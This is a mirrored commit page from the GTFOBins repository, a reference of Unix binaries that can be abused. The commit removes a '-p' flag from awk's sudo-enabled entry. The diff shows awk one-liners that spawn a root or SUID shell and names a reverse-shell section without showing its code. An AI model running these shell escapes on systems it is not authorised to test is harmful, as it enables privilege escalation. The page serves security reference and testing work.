mirror of
				https://github.com/GTFOBins/GTFOBins.github.io
				synced 2025-10-31 08:48:54 +01:00 
			
		
		
		
	Remove the -p option from sudo-enabled (typo)
This commit is contained in:
		| @@ -3,7 +3,7 @@ functions: | ||||
|   exec-interactive: | ||||
|     - code: awk 'BEGIN {system("/bin/sh")}' | ||||
|   sudo-enabled: | ||||
|     - code: sudo awk 'BEGIN {system("/bin/sh -p")}' | ||||
|     - code: sudo awk 'BEGIN {system("/bin/sh")}' | ||||
|   suid-limited: | ||||
|     - code: ./awk 'BEGIN {system("/bin/sh -p")}' | ||||
|   reverse-shell-non-interactive: | ||||
|   | ||||
		Reference in New Issue
	
	Block a user